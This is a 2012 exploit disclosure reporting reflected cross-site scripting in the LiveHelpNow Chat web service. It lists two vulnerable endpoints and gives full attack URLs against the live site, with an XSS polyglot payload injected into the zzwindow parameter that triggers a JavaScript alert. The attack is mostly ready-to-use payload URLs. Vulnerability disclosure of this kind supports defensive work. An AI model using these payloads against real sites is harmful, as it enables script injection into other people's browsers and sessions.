# Exploit Title: LiveHelpNow Chat Cross Site Scripting
# Date: 21.02.2012
# Author: Sony
# Software Link: http://www.livehelpnow.net/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/livehelpnow-chat-cross-site-scripting.html
..................................................................

What is LiveHelpNow Chat?

You can read about Chat here:

http://www.livehelpnow.net/

Who use LiveHelpNow?

http://www.livehelpnow.net/images/showcase1.jpg
http://www.livehelpnow.net/images/showcase2.jpg
http://www.livehelpnow.net/images/showcase3.jpg
http://www.livehelpnow.net/images/showcase4.jpg
http://www.livehelpnow.net/images/showcase5.jpg
http://www.livehelpnow.net/images/showcase6.jpg


We have xss in the link :

/lhn/lcv_custom.aspx
/lhn/prechat.aspx

https://www.livehelpnow.net/lhn/lcv_custom.aspx?d=0&ms=&zzwindow=318%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&lhnid=1288&custom1=http%3a%2f%2fwww.barracudanetworks.com%2fns%2f%3fL%3den&custom2=&custom3=&time=2/20/2012%2011:07:52%20AM

http://1.bp.blogspot.com/-b8nq4YwzhFY/T0PuZJJDMKI/AAAAAAAAAj8/orRVQ9cempY/s1600/live.JPG



http://www.livehelpnow.net/lhn/prechat.aspx?d=0&ms=&zzwindow=0%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&lhnid=3727&custom1=&custom2=&custom3=&time=2/20/2012%2011:25:04%20AM

http://1.bp.blogspot.com/-mKQjFv3W79A/T0PufJ6PLgI/AAAAAAAAAkI/Z7b2hwdWDJA/s1600/live2.JPG

..................................................................

InSecurity.Ro

Because we care, we're security aware!